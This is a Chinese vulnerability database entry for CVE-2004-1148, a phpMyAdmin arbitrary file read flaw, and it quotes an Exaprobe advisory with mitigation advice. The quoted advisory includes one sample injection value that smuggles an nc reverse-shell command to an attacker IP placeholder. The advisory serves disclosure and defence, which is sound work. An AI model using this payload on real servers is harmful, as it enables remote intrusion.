CVE-2004-1148
CVSS5.0
发布时间 :2005-01-10 00:00:00
修订时间 :2016-10-17 22:51:45
NMCOP    

[原文]phpMyAdmin before 2.6.1, when configured with UploadDir functionality, allows remote attackers to read arbitrary files via the sql_localfile parameter.


[CNNVD]phpMyAdm UploadDir 信息泄露漏洞(CNNVD-200501-079)

        phpMyAdmin是一个免费工具,为管理MySQL提供了一个WWW管理接口。
        phpMyAdmin 2.6.1之前版本中存在信息泄露漏洞。
        当配置启用UploadDir功能时,远程攻击者可利用sql_localfie参数,读取任意文件。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:phpmyadmin:phpmyadmin:2.5.2
cpe:/a:phpmyadmin:phpmyadmin:2.5.1
cpe:/a:phpmyadmin:phpmyadmin:2.5.4
cpe:/a:phpmyadmin:phpmyadmin:2.5.5
cpe:/a:phpmyadmin:phpmyadmin:2.5.5_rc2
cpe:/a:phpmyadmin:phpmyadmin:2.5.5_rc1
cpe:/a:phpmyadmin:phpmyadmin:2.5.7
cpe:/a:phpmyadmin:phpmyadmin:2.5.5_pl1
cpe:/a:phpmyadmin:phpmyadmin:2.5.7_pl1
cpe:/a:phpmyadmin:phpmyadmin:2.6.0_pl3
cpe:/a:phpmyadmin:phpmyadmin:2.5.0
cpe:/a:phpmyadmin:phpmyadmin:2.4.0
cpe:/a:phpmyadmin:phpmyadmin:2.5.6_rc1
cpe:/a:phpmyadmin:phpmyadmin:2.6.0_pl2
cpe:/a:phpmyadmin:phpmyadmin:2.6.0_pl1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1148
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1148
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200501-079
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=110295781828323&w=2
(UNKNOWN)  BUGTRAQ  20041213 Multiple vulnerabilities in phpMyAdmin
http://www.exaprobe.com/labs/advisories/esa-2004-1213.html
(UNKNOWN)  MISC  http://www.exaprobe.com/labs/advisories/esa-2004-1213.html
http://xforce.iss.net/xforce/xfdb/18441
(UNKNOWN)  XF  phpmyadmin-command-execute(18441)

- 漏洞信息

phpMyAdm UploadDir 信息泄露漏洞
中危 输入验证
2005-01-10 00:00:00 2005-10-20 00:00:00
远程  
        phpMyAdmin是一个免费工具,为管理MySQL提供了一个WWW管理接口。
        phpMyAdmin 2.6.1之前版本中存在信息泄露漏洞。
        当配置启用UploadDir功能时,远程攻击者可利用sql_localfie参数,读取任意文件。

- 公告与补丁

        
        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://www.phpmyadmin.net/home_page/downloads.php

- 漏洞信息 (F35314)

phpMyAdmin261rc1.txt (PacketStormID:F35314)
2004-12-30 00:00:00
Nicolas Gregoire  exaprobe.com
advisory,vulnerability
CVE-2004-1147,CVE-2004-1148
[点击下载]

phpMyAdmin versions prior to 2.6.1-rc1 suffer from command execution and file disclosure vulnerabilities.

Exaprobe
                            www.exaprobe.com

                           Security Advisory

 Advisory Name: Multiple vulnerabilities in phpMyAdmin
  Release Date: 13 December 2004
   Application: phpMyAdmin prior to 2.6.1-rc1
      Platform: Any webserver running PHP
      Severity: Remote code execution
        Author: Nicolas Gregoire <ngregoire@exaprobe.com>
 Vendor Status: Updated code is available
CVE Candidates: CAN-2004-1147 and CAN-2004-1148
     Reference: www.exaprobe.com/labs/advisories/esa-2004-1213.html


Overview :
==========

phpMyAdmin is a tool written in PHP intended to handle the 
administration of MySQL over the Web. Currently it can create and
drop databases, create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields, manage privileges,
export data into various formats and is available in 47 languages.


Technical details :
===================

Command execution :

	- bug introduced in 2.6.0-pl2
	- attacker does *not* need access to the phpMyAdmin interface
	- PHP safe mode must be off
	- external transformations must be activated
	- sample of offensive value : F\';nc -e /bin/sh $IP 80;echo \'A

File disclosure :

	- attacker need access to the phpMyAdmin interface
	- PHP safe mode must be off
	- $cfg['UploadDir'] must be defined
	- exploitation is done via 'sql_localfile'


Vendor Response :
=================

After notification by Exaprobe, maintainers of the phpMyAdmin
project have released version 2.6.1-rc1 which fixes these two
vulnerabilities.


Recommendation :
================

Upgrade to 2.6.1-rc1 or newer.
Desactivate uploads and transformations if possible.


CVE Information :
=================

The Common Vulnerabilities and Exposures (CVE) project has assigned 
the following names to these issues.  These are candidates for 
inclusion in the CVE list (http://cve.mitre.org), which standardizes 
names for security problems.

  CAN-2004-1147  Command execution in phpMyAdmin
  CAN-2004-1148  File disclosure in phpMyAdmin

-- 
Nicolas Gregoire ----- Consultant en S    

- 漏洞信息

12331
phpMyAdmin UploadDir Function sql_localfile Parameter Arbitrary File Access
Remote / Network Access Information Disclosure
Loss of Confidentiality
Exploit Unknown

- 漏洞描述

phpMyAdmin contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered on systems where $cfg['UploadDir'] is defined and PHP safe mode is disabled. 'sql_localfile' is not properly sanatized and can be exploited by a remote malicious user by calling read_dump.php via a crafted form from the phpMyAdmin interface, which will disclose file information resulting in a loss of confidentiality.

- 时间线

2004-12-13 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 2.6.1-rc1 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): Setting PHP safe mode to ON. If not feasible, deactivate the UploadDir mechanism.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站